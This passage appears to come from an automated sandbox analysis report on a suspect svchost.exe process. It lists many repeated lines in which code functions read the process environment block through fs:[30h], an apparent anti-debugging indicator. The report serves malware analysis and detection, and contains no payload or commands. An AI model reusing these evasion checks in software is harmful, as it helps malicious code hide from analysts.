Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h] 1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h] 1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h] 1_2_03150310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h] 1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h] 1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h] 1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h] 1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h] 1_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h] 1_2_031D8350
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D437C mov eax, dword ptr fs:[00000030h] 1_2_031D437C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320634F mov eax, dword ptr fs:[00000030h] 1_2_0320634F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h] 1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h] 1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h] 1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h] 1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h] 1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h] 1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h] 1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h] 1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h] 1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h] 1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h] 1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h] 1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h] 1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h] 1_2_031EC3CD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h] 1_2_031B63C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]1_2_031663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]1_2_0312823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]1_2_0312A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]1_2_03136259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]1_2_0312826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320625D mov eax, dword ptr fs:[00000030h]1_2_0320625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032062D6 mov eax, dword ptr fs:[00000030h]1_2_032062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]1_2_031F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]1_2_03160124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]1_2_0312C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]1_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]1_2_03170185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]1_2_032061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]1_2_031601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]1_2_031B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6030 mov eax, dword ptr fs:[00000030h]1_2_031C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]1_2_0312A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]1_2_0312C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]1_2_03132050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]1_2_031B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]1_2_0315C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]1_2_0313208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031280A0 mov eax, dword ptr fs:[00000030h]1_2_031280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]1_2_031C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]1_2_031B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]1_2_0312C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]1_2_031720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0312A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]1_2_031380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]1_2_031B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]1_2_03130710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]1_2_03160710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]1_2_0316C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]1_2_031AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]1_2_03130750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]1_2_031BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]1_2_031B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]1_2_03138770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D678E mov eax, dword ptr fs:[00000030h]1_2_031D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]1_2_031307AF
